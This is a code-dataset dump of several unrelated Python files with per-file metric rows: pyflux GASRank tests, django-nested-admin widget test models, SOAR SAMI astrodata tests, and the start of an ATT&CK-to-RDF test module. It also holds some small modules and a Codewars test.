| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
150fffdffae0ec140080bb8e581bcc53de4b8fae
| 6,406
|
py
|
Python
|
pyflux/gas/tests/gas_rank_tests.py
|
ThomasHoppe/pyflux
|
297f2afc2095acd97c12e827dd500e8ea5da0c0f
|
[
"BSD-3-Clause"
] | 2,091
|
2016-04-01T02:52:10.000Z
|
2022-03-29T11:38:15.000Z
|
pyflux/gas/tests/gas_rank_tests.py
|
EricSchles/pyflux
|
297f2afc2095acd97c12e827dd500e8ea5da0c0f
|
[
"BSD-3-Clause"
] | 160
|
2016-04-26T14:52:18.000Z
|
2022-03-15T02:09:07.000Z
|
pyflux/gas/tests/gas_rank_tests.py
|
EricSchles/pyflux
|
297f2afc2095acd97c12e827dd500e8ea5da0c0f
|
[
"BSD-3-Clause"
] | 264
|
2016-05-02T14:03:31.000Z
|
2022-03-29T07:48:20.000Z
|
import numpy as np
import pyflux as pf
import pandas as pd
data = pd.read_csv("http://www.pyflux.com/notebooks/nfl_data_new.csv")
data["PointsDiff"] = data["HomeScore"] - data["AwayScore"]
def test_mle():
"""
Tests latent variable list length is correct, and that the estimated
latent variables are not nan
"""
model = pf.GASRank(data=data,team_1="HomeTeam", team_2="AwayTeam",
score_diff="PointsDiff", family=pf.Normal())
x = model.fit()
assert(len(model.latent_variables.z_list) == 3)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test_mh():
"""
Tests latent variable list length is correct, and that the estimated
latent variables are not nan
"""
model = pf.GASRank(data=data,team_1="HomeTeam", team_2="AwayTeam",
score_diff="PointsDiff", family=pf.Normal())
x = model.fit('M-H', nsims=200)
assert(len(model.latent_variables.z_list) == 3)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test_pml():
"""
Tests latent variable list length is correct, and that the estimated
latent variables are not nan
"""
model = pf.GASRank(data=data,team_1="HomeTeam", team_2="AwayTeam",
score_diff="PointsDiff", family=pf.Normal())
x = model.fit('PML')
assert(len(model.latent_variables.z_list) == 3)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test_laplace():
"""
Tests latent variable list length is correct, and that the estimated
latent variables are not nan
"""
model = pf.GASRank(data=data,team_1="HomeTeam", team_2="AwayTeam",
score_diff="PointsDiff", family=pf.Normal())
x = model.fit('Laplace')
assert(len(model.latent_variables.z_list) == 3)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test_bbvi():
"""
Tests latent variable list length is correct, and that the estimated
latent variables are not nan
"""
model = pf.GASRank(data=data,team_1="HomeTeam", team_2="AwayTeam",
score_diff="PointsDiff", family=pf.Normal())
x = model.fit('BBVI', iterations=100)
assert(len(model.latent_variables.z_list) == 3)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test_predict():
model = pf.GASRank(data=data,team_1="HomeTeam", team_2="AwayTeam",
score_diff="PointsDiff", family=pf.Normal())
model.fit()
prediction = model.predict("Denver Broncos","Carolina Panthers",neutral=True)
assert(len(prediction[np.isnan(prediction)]) == 0)
def test_mle_two_components():
"""
Tests latent variable list length is correct, and that the estimated
latent variables are not nan
"""
model = pf.GASRank(data=data,team_1="HomeTeam", team_2="AwayTeam",
score_diff="PointsDiff", family=pf.Normal())
model.add_second_component("HQB","AQB")
x = model.fit()
assert(len(model.latent_variables.z_list) == 4)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
prediction = model.predict("Denver Broncos","Carolina Panthers","Peyton Manning","Cam Newton",neutral=True)
assert(len(prediction[np.isnan(prediction)]) == 0)
def test_t_mle():
"""
Tests latent variable list length is correct, and that the estimated
latent variables are not nan
"""
model = pf.GASRank(data=data,team_1="HomeTeam", team_2="AwayTeam",
score_diff="PointsDiff", family=pf.t())
x = model.fit()
assert(len(model.latent_variables.z_list) == 4)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test_t_pml():
"""
Tests latent variable list length is correct, and that the estimated
latent variables are not nan
"""
model = pf.GASRank(data=data,team_1="HomeTeam", team_2="AwayTeam",
score_diff="PointsDiff", family=pf.t())
x = model.fit('PML')
assert(len(model.latent_variables.z_list) == 4)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test_t_laplace():
"""
Tests latent variable list length is correct, and that the estimated
latent variables are not nan
"""
model = pf.GASRank(data=data,team_1="HomeTeam", team_2="AwayTeam",
score_diff="PointsDiff", family=pf.t())
x = model.fit('Laplace')
assert(len(model.latent_variables.z_list) == 4)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test_t_bbvi():
"""
Tests latent variable list length is correct, and that the estimated
latent variables are not nan
"""
model = pf.GASRank(data=data,team_1="HomeTeam", team_2="AwayTeam",
score_diff="PointsDiff", family=pf.t())
x = model.fit('BBVI', iterations=100)
assert(len(model.latent_variables.z_list) == 4)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
def test_t_predict():
model = pf.GASRank(data=data,team_1="HomeTeam", team_2="AwayTeam",
score_diff="PointsDiff", family=pf.t())
model.fit()
prediction = model.predict("Denver Broncos","Carolina Panthers",neutral=True)
assert(len(prediction[np.isnan(prediction)]) == 0)
def test_t_mle_two_components():
"""
Tests latent variable list length is correct, and that the estimated
latent variables are not nan
"""
model = pf.GASRank(data=data.iloc[0:300,:],team_1="HomeTeam", team_2="AwayTeam",
score_diff="PointsDiff", family=pf.t())
model.add_second_component("HQB","AQB")
x = model.fit('BBVI',iterations=50,map_start=False)
assert(len(model.latent_variables.z_list) == 5)
lvs = np.array([i.value for i in model.latent_variables.z_list])
assert(len(lvs[np.isnan(lvs)]) == 0)
prediction = model.predict("Denver Broncos","Carolina Panthers","Peyton Manning","Cam Newton",neutral=True)
assert(len(prediction[np.isnan(prediction)]) == 0)
| 40.0375
| 111
| 0.657821
| 929
| 6,406
| 4.413348
| 0.108719
| 0.120732
| 0.107317
| 0.112683
| 0.955854
| 0.952439
| 0.952439
| 0.944146
| 0.944146
| 0.930244
| 0
| 0.013007
| 0.19591
| 6,406
| 159
| 112
| 40.289308
| 0.782955
| 0.168124
| 0
| 0.78
| 0
| 0
| 0.123681
| 0
| 0
| 0
| 0
| 0
| 0.26
| 1
| 0.13
| false
| 0
| 0.03
| 0
| 0.16
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
12c26cc135266103ed50c9adbd6b9bf925ff1a3f
| 518
|
py
|
Python
|
coba/exceptions.py
|
anrath/coba
|
635fd21306f52b27e7f5d78ee05148e6934e3d38
|
[
"BSD-3-Clause"
] | null | null | null |
coba/exceptions.py
|
anrath/coba
|
635fd21306f52b27e7f5d78ee05148e6934e3d38
|
[
"BSD-3-Clause"
] | null | null | null |
coba/exceptions.py
|
anrath/coba
|
635fd21306f52b27e7f5d78ee05148e6934e3d38
|
[
"BSD-3-Clause"
] | null | null | null |
class CobaException(Exception):
def _render_traceback_(self):
#This is a special method used by Jupyter Notebook for writing tracebacks
#By dummying it up we can prevent CobaException from writing tracebacks in Jupyter Notebook
pass
class CobaFatal(Exception):
def _render_traceback_(self):
#This is a special method used by Jupyter Notebook for writing tracebacks
#By dummying it up we can prevent CobaException from writing tracebacks in Jupyter Notebook
pass
| 47.090909
| 99
| 0.741313
| 68
| 518
| 5.558824
| 0.426471
| 0.15873
| 0.095238
| 0.142857
| 0.915344
| 0.915344
| 0.915344
| 0.915344
| 0.915344
| 0.915344
| 0
| 0
| 0.227799
| 518
| 11
| 100
| 47.090909
| 0.945
| 0.625483
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.333333
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
12ea95c6949b3a9e841a04dfa53750628bac45d4
| 561
|
py
|
Python
|
Codewars/8kyu/total-amount-of-points/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | 7
|
2017-09-20T16:40:39.000Z
|
2021-08-31T18:15:08.000Z
|
Codewars/8kyu/total-amount-of-points/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
Codewars/8kyu/total-amount-of-points/Python/test.py
|
RevansChen/online-judge
|
ad1b07fee7bd3c49418becccda904e17505f3018
|
[
"MIT"
] | null | null | null |
# Python - 3.6.0
Test.describe('Basic Tests')
Test.assert_equals(points(['1:0', '2:0', '3:0', '4:0', '2:1', '3:1', '4:1', '3:2', '4:2', '4:3']), 30)
Test.assert_equals(points(['1:1', '2:2', '3:3', '4:4', '2:2', '3:3', '4:4', '3:3', '4:4', '4:4']), 10)
Test.assert_equals(points(['0:1', '0:2', '0:3', '0:4', '1:2', '1:3', '1:4', '2:3', '2:4', '3:4']), 0)
Test.assert_equals(points(['1:0', '2:0', '3:0', '4:0', '2:1', '1:3', '1:4', '2:3', '2:4', '3:4']), 15)
Test.assert_equals(points(['1:0', '2:0', '3:0', '4:4', '2:2', '3:3', '1:4', '2:3', '2:4', '3:4']), 12)
| 62.333333
| 102
| 0.454545
| 133
| 561
| 1.879699
| 0.135338
| 0.048
| 0.32
| 0.44
| 0.688
| 0.58
| 0.516
| 0.488
| 0.488
| 0.452
| 0
| 0.224449
| 0.110517
| 561
| 8
| 103
| 70.125
| 0.276553
| 0.024955
| 0
| 0
| 0
| 0
| 0.295413
| 0
| 0
| 0
| 0
| 0
| 0.833333
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
421865f8299ab808a678c8ce7bb62d98d6c6f1fd
| 162
|
py
|
Python
|
src/lk_db/ents/both/census/EntOccupationStatusOfHousingUnits.py
|
nuuuwan/lk_db
|
ac0abfa47ba31b0d4c2c8566b3101b83749bd45d
|
[
"MIT"
] | null | null | null |
src/lk_db/ents/both/census/EntOccupationStatusOfHousingUnits.py
|
nuuuwan/lk_db
|
ac0abfa47ba31b0d4c2c8566b3101b83749bd45d
|
[
"MIT"
] | null | null | null |
src/lk_db/ents/both/census/EntOccupationStatusOfHousingUnits.py
|
nuuuwan/lk_db
|
ac0abfa47ba31b0d4c2c8566b3101b83749bd45d
|
[
"MIT"
] | null | null | null |
# Auto Generated - DO NOT EDIT!
from lk_db.ents.both.EntCensusResult import EntCensusResult
class EntOccupationStatusOfHousingUnits(EntCensusResult):
pass
| 20.25
| 59
| 0.814815
| 17
| 162
| 7.705882
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12963
| 162
| 7
| 60
| 23.142857
| 0.929078
| 0.179012
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
4277cac795635e21cc02ce41499a70e40be9f030
| 127
|
py
|
Python
|
pylox/grammar/__init__.py
|
classabbyamp/pylox
|
c2dc991603f5e59d8655fbae2cbad283ea388de6
|
[
"BSD-3-Clause"
] | null | null | null |
pylox/grammar/__init__.py
|
classabbyamp/pylox
|
c2dc991603f5e59d8655fbae2cbad283ea388de6
|
[
"BSD-3-Clause"
] | null | null | null |
pylox/grammar/__init__.py
|
classabbyamp/pylox
|
c2dc991603f5e59d8655fbae2cbad283ea388de6
|
[
"BSD-3-Clause"
] | null | null | null |
from . import token # noqa: F401
from . import expression as expr # noqa: F401
from . import statement as stmt # noqa: F401
| 31.75
| 46
| 0.708661
| 19
| 127
| 4.736842
| 0.526316
| 0.333333
| 0.266667
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 0.220472
| 127
| 3
| 47
| 42.333333
| 0.818182
| 0.251969
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
427e0393c565ee3336b63ce515c91416c571a286
| 10,464
|
py
|
Python
|
nested_admin/tests/admin_widgets/models.py
|
pasevin/django-nested-admin
|
5fee72ca74b79863bdc2a102aa47282dd6b770c9
|
[
"BSD-2-Clause"
] | null | null | null |
nested_admin/tests/admin_widgets/models.py
|
pasevin/django-nested-admin
|
5fee72ca74b79863bdc2a102aa47282dd6b770c9
|
[
"BSD-2-Clause"
] | null | null | null |
nested_admin/tests/admin_widgets/models.py
|
pasevin/django-nested-admin
|
5fee72ca74b79863bdc2a102aa47282dd6b770c9
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import unicode_literals
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models import ForeignKey, CASCADE
from nested_admin.tests.compat import python_2_unicode_compatible
class WidgetsRoot(models.Model):
name = models.CharField(max_length=200)
@python_2_unicode_compatible
class WidgetsRelated1(models.Model):
name = models.CharField(max_length=200)
def __str__(self):
return self.name
def related_label(self):
return self.name
@staticmethod
def autocomplete_search_fields():
return ("name__icontains", )
@python_2_unicode_compatible
class WidgetsRelated2(models.Model):
name = models.CharField(max_length=200)
date_created = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ['-date_created']
def __str__(self):
return self.name
def related_label(self):
return self.name
@staticmethod
def autocomplete_search_fields():
return ("name__icontains", )
@python_2_unicode_compatible
class WidgetsM2M(models.Model):
name = models.CharField(max_length=200)
def __str__(self):
return self.name
@python_2_unicode_compatible
class WidgetsM2MTwo(models.Model):
name = models.CharField(max_length=200)
def __str__(self):
return self.name
def related_label(self):
return self.name
@staticmethod
def autocomplete_search_fields():
return ("name__icontains", )
@python_2_unicode_compatible
class WidgetsM2MThree(models.Model):
name = models.CharField(max_length=200)
def __str__(self):
return self.name
def related_label(self):
return self.name
@staticmethod
def autocomplete_search_fields():
return ("name__icontains", )
@python_2_unicode_compatible
class WidgetsA(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField()
parent = ForeignKey(WidgetsRoot, on_delete=CASCADE)
position = models.PositiveIntegerField()
date = models.DateTimeField(blank=True, null=True)
upload = models.FileField(blank=True, null=True, upload_to='foo')
fk1 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
on_delete=CASCADE, related_name='+')
fk2 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
on_delete=CASCADE, related_name='+')
fk3 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
on_delete=CASCADE, related_name='+')
fk4 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
on_delete=CASCADE, related_name='+')
m2m = models.ManyToManyField(WidgetsM2M, blank=True)
m2m_two = models.ManyToManyField(WidgetsM2MTwo, blank=True)
m2m_three = models.ManyToManyField(WidgetsM2MThree, blank=True)
content_type = ForeignKey(ContentType, null=True, blank=True, on_delete=CASCADE)
object_id = models.PositiveIntegerField(null=True, blank=True)
content_object = GenericForeignKey()
relation_type = ForeignKey(ContentType, null=True, blank=True,
on_delete=CASCADE, related_name='+')
relation_id = models.PositiveIntegerField(null=True, blank=True)
relation_object = GenericForeignKey('relation_type', 'relation_id')
class Meta:
ordering = ('position', )
def __str__(self):
return self.name
@python_2_unicode_compatible
class WidgetsB(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField()
parent = ForeignKey(WidgetsA, on_delete=CASCADE)
position = models.PositiveIntegerField()
date = models.DateTimeField(blank=True, null=True)
upload = models.FileField(blank=True, null=True, upload_to='foo')
fk1 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
on_delete=CASCADE, related_name='+')
fk2 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
on_delete=CASCADE, related_name='+')
fk3 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
on_delete=CASCADE, related_name='+')
fk4 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
on_delete=CASCADE, related_name='+')
m2m = models.ManyToManyField(WidgetsM2M, blank=True)
m2m_two = models.ManyToManyField(WidgetsM2MTwo, blank=True)
m2m_three = models.ManyToManyField(WidgetsM2MThree, blank=True)
content_type = ForeignKey(ContentType, null=True, blank=True, on_delete=CASCADE)
object_id = models.PositiveIntegerField(null=True, blank=True)
content_object = GenericForeignKey('content_type', 'object_id')
relation_type = ForeignKey(ContentType, null=True, blank=True,
on_delete=CASCADE, related_name='+')
relation_id = models.PositiveIntegerField(null=True, blank=True)
relation_object = GenericForeignKey('relation_type', 'relation_id')
class Meta:
ordering = ('position', )
def __str__(self):
parent_name = self.parent.name if self.parent else '?'
return "%s - %s" % (parent_name, self.name)
@python_2_unicode_compatible
class WidgetsC0(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField()
parent = ForeignKey(WidgetsB, on_delete=CASCADE)
position = models.PositiveIntegerField()
date = models.DateTimeField(blank=True, null=True)
upload = models.FileField(blank=True, null=True, upload_to='foo')
fk1 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
on_delete=CASCADE, related_name='+')
fk2 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
on_delete=CASCADE, related_name='+')
fk3 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
on_delete=CASCADE, related_name='+')
fk4 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
on_delete=CASCADE, related_name='+')
m2m = models.ManyToManyField(WidgetsM2M, blank=True)
m2m_two = models.ManyToManyField(WidgetsM2MTwo, blank=True)
m2m_three = models.ManyToManyField(WidgetsM2MThree, blank=True)
content_type = ForeignKey(ContentType, null=True, blank=True, on_delete=CASCADE)
object_id = models.PositiveIntegerField(null=True, blank=True)
content_object = GenericForeignKey()
relation_type = ForeignKey(ContentType, null=True, blank=True,
on_delete=CASCADE, related_name='+')
relation_id = models.PositiveIntegerField(null=True, blank=True)
relation_object = GenericForeignKey('relation_type', 'relation_id')
class Meta:
ordering = ('position', )
def __str__(self):
parent_name = self.parent.name if self.parent else '?'
return "%s - %s" % (parent_name, self.name)
@python_2_unicode_compatible
class WidgetsC1(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField()
parent = ForeignKey(WidgetsB, on_delete=CASCADE)
position = models.PositiveIntegerField()
date = models.DateTimeField(blank=True, null=True)
upload = models.FileField(blank=True, null=True, upload_to='foo')
fk1 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
on_delete=CASCADE, related_name='+')
fk2 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
on_delete=CASCADE, related_name='+')
fk3 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
on_delete=CASCADE, related_name='+')
fk4 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
on_delete=CASCADE, related_name='+')
m2m = models.ManyToManyField(WidgetsM2M, blank=True)
m2m_two = models.ManyToManyField(WidgetsM2MTwo, blank=True)
content_type = ForeignKey(ContentType, null=True, blank=True, on_delete=CASCADE)
object_id = models.PositiveIntegerField(null=True, blank=True)
content_object = GenericForeignKey()
class Meta:
ordering = ('position', )
def __str__(self):
parent_name = self.parent.name if self.parent else '?'
return "%s - %s" % (parent_name, self.name)
class WidgetMediaOrderRoot(models.Model):
name = models.CharField(max_length=200)
@python_2_unicode_compatible
class WidgetMediaOrderA(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField()
parent = ForeignKey(WidgetMediaOrderRoot, on_delete=CASCADE)
position = models.PositiveIntegerField()
class Meta:
ordering = ('position', )
def __str__(self):
return self.name
@python_2_unicode_compatible
class WidgetMediaOrderB(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField()
parent = ForeignKey(WidgetMediaOrderA, on_delete=CASCADE)
position = models.PositiveIntegerField()
class Meta:
ordering = ('position', )
def __str__(self):
parent_name = self.parent.name if self.parent else '?'
return "%s - %s" % (parent_name, self.name)
@python_2_unicode_compatible
class WidgetMediaOrderC0(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField()
parent = ForeignKey(WidgetMediaOrderB, on_delete=CASCADE)
position = models.PositiveIntegerField()
class Meta:
ordering = ('position', )
def __str__(self):
parent_name = self.parent.name if self.parent else '?'
return "%s - %s" % (parent_name, self.name)
@python_2_unicode_compatible
class WidgetMediaOrderC1(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField()
parent = ForeignKey(WidgetMediaOrderB, on_delete=CASCADE)
position = models.PositiveIntegerField()
date = models.DateTimeField(blank=True, null=True)
upload = models.FileField(blank=True, null=True, upload_to='foo')
fk1 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
on_delete=CASCADE, related_name='+')
fk2 = models.ForeignKey(WidgetsRelated1, blank=True, null=True,
on_delete=CASCADE, related_name='+')
fk3 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
on_delete=CASCADE, related_name='+')
fk4 = models.ForeignKey(WidgetsRelated2, blank=True, null=True,
on_delete=CASCADE, related_name='+')
m2m = models.ManyToManyField(WidgetsM2M, blank=True)
class Meta:
ordering = ('position', )
def __str__(self):
parent_name = self.parent.name if self.parent else '?'
return "%s - %s" % (parent_name, self.name)
| 34.996656
| 84
| 0.713876
| 1,200
| 10,464
| 6.016667
| 0.076667
| 0.069806
| 0.072715
| 0.070637
| 0.917867
| 0.91385
| 0.91385
| 0.91385
| 0.908033
| 0.908033
| 0
| 0.015292
| 0.175076
| 10,464
| 298
| 85
| 35.114094
| 0.821131
| 0
| 0
| 0.878261
| 0
| 0
| 0.030199
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.091304
| false
| 0
| 0.026087
| 0.065217
| 0.76087
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
42a0f3932e2fc3c9bb0a43ec07d36a2d59283f46
| 3,779
|
py
|
Python
|
soar_instruments/test/test_sami.py
|
soar-telescope/dragons-soar
|
a1c600074f532c1af6bd59bc2cc662a1aecd39c4
|
[
"MIT"
] | 1
|
2017-10-31T21:02:59.000Z
|
2017-10-31T21:02:59.000Z
|
soar_instruments/test/test_sami.py
|
soar-telescope/dragons-soar
|
a1c600074f532c1af6bd59bc2cc662a1aecd39c4
|
[
"MIT"
] | null | null | null |
soar_instruments/test/test_sami.py
|
soar-telescope/dragons-soar
|
a1c600074f532c1af6bd59bc2cc662a1aecd39c4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import glob
import os
import unittest
import soar_instruments
import soardr
import astrodata
class Test_IO(unittest.TestCase):
path = "soar_instruments/test/data/"
def test_acq(self):
"""
Just check if the a DOMEFLAT obtained with SAMI is read correctly and if
the tags are set properly.
"""
sample_acq = os.path.join(self.path, "sami_acq.fits")
# Check if file exists
self.assertTrue(os.path.exists(sample_acq))
# Try to open in astrodata
ad = astrodata.open(sample_acq)
# Check if the tags are set correctly
self.assertIn('SOAR', ad.tags)
self.assertIn('SAM', ad.tags)
self.assertIn('SAMI', ad.tags)
self.assertIn('IMAGE', ad.tags)
def test_bias(self):
"""
Just check if the a BIAS obtained with SAMI is read correctly and if
the tags are set properly.
"""
sample_bias = os.path.join(self.path, "sami_bias.fits")
# Check if file exists
assert os.path.exists(sample_bias)
# Try to open in astrodata
ad = astrodata.open(sample_bias)
# Check if the tags are set correctly
self.assertIn('SOAR', ad.tags)
self.assertIn('SAM', ad.tags)
self.assertIn('SAMI', ad.tags)
self.assertIn('CAL', ad.tags)
self.assertIn('BIAS', ad.tags)
def test_domeflat(self):
sample_flat = os.path.join(self.path, "sami_domeflat.fits")
# Check if file exists
self.assertTrue(os.path.exists(sample_flat))
# Try to open in astrodata
ad = astrodata.open(sample_flat)
# Check if the tags are set correctly
self.assertIn('SOAR', ad.tags)
self.assertIn('SAM', ad.tags)
self.assertIn('SAMI', ad.tags)
self.assertIn('CAL', ad.tags)
self.assertIn('FLAT', ad.tags)
def test_object(self):
"""
Just check if the an OBJECT obtained with SAMI is read correctly and if
the tags are set properly.
"""
sample_object = os.path.join(self.path, "sami_object.fits")
# Check if file exists
self.assertTrue(os.path.exists(sample_object))
# Try to open in astrodata
ad = astrodata.open(sample_object)
# Check if the tags are set correctly
self.assertIn('SOAR', ad.tags)
self.assertIn('SAM', ad.tags)
self.assertIn('SAMI', ad.tags)
self.assertIn('IMAGE', ad.tags)
def test_sky_flat(self):
"""
Just check if the a SKYFLAT obtained with SAMI is read correctly and if
the tags are set properly.
"""
sample_flat = os.path.join(self.path, "sami_skyflat.fits")
# Check if file exists
self.assertTrue(os.path.exists(sample_flat))
# Try to open in astrodata
ad = astrodata.open(sample_flat)
# Check if the tags are set correctly
self.assertIn('SOAR', ad.tags)
self.assertIn('SAM', ad.tags)
self.assertIn('SAMI', ad.tags)
self.assertIn('CAL', ad.tags)
self.assertIn('FLAT', ad.tags)
class Test_Attributes(unittest.TestCase):
path = "soar_instruments/test/data/"
def test_datasec(self):
files = glob.glob(os.path.join(self.path, "sami_*.fits"))
for f in files:
ad = astrodata.open(f)
ad.data_section()
def test_filters(self):
files = glob.glob(os.path.join(self.path, "sami_*.fits"))
for f in files:
ad = astrodata.open(f)
ad.filter_name()
def test_gain(self):
files = glob.glob(os.path.join(self.path, "sami_*.fits"))
for f in files:
ad = astrodata.open(f)
ad.gain()
| 27.384058
| 80
| 0.598042
| 511
| 3,779
| 4.34638
| 0.135029
| 0.124268
| 0.081045
| 0.14588
| 0.841963
| 0.824403
| 0.769023
| 0.769023
| 0.742909
| 0.642503
| 0
| 0.000372
| 0.289495
| 3,779
| 137
| 81
| 27.583942
| 0.826816
| 0.218576
| 0
| 0.544118
| 0
| 0
| 0.089229
| 0.019197
| 0
| 0
| 0
| 0
| 0.411765
| 1
| 0.117647
| false
| 0
| 0.088235
| 0
| 0.264706
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
35f240493656ab1e0c8a0fcde9c981bc68a935eb
| 53,282
|
py
|
Python
|
tests/test_rdf_transformation.py
|
mswimmer/AttackModel
|
62e03c29def7c6d45cbd8591412731afab987537
|
[
"MIT"
] | null | null | null |
tests/test_rdf_transformation.py
|
mswimmer/AttackModel
|
62e03c29def7c6d45cbd8591412731afab987537
|
[
"MIT"
] | null | null | null |
tests/test_rdf_transformation.py
|
mswimmer/AttackModel
|
62e03c29def7c6d45cbd8591412731afab987537
|
[
"MIT"
] | null | null | null |
import pytest
from attackmodel import rdf
from rdflib.plugins.sparql import prepareQuery
from rdflib.namespace import RDF, RDFS, XSD, DC, DCTERMS, FOAF, SKOS
def get_model(infile, title, rdf_class):
model = rdf.AttackModel()
model.load_stix(file_name=infile, url="file://"+infile, title=title, rdf_class=rdf_class)
model.convert()
return model
@pytest.fixture()
def attack_pattern():
yield get_model(infile='tests/data/attack-pattern-1.json', title='attack-pattern-1', rdf_class=rdf.CTI['EnterpriseCatalog'])
@pytest.fixture()
def intrusion_set():
yield get_model(infile='tests/data/intrusion-set-1.json', title='intrusion-set-1', rdf_class=rdf.CTI['EnterpriseCatalog'])
@pytest.fixture()
def relationship():
yield get_model(infile='tests/data/relationship-1.json', title='relationship-1', rdf_class=rdf.CTI['EnterpriseCatalog'])
@pytest.fixture()
def course_of_action():
yield get_model(infile='tests/data/course-of-action-1.json', title='course-of-action-1', rdf_class=rdf.CTI['EnterpriseCatalog'])
@pytest.fixture()
def pre():
yield get_model(infile='tests/data/pre-1.json', title='pre-1', rdf_class=rdf.CTI['PreCatalog'])
def ask(model, asking):
pq = prepareQuery(
"ASK { " + asking + " }",
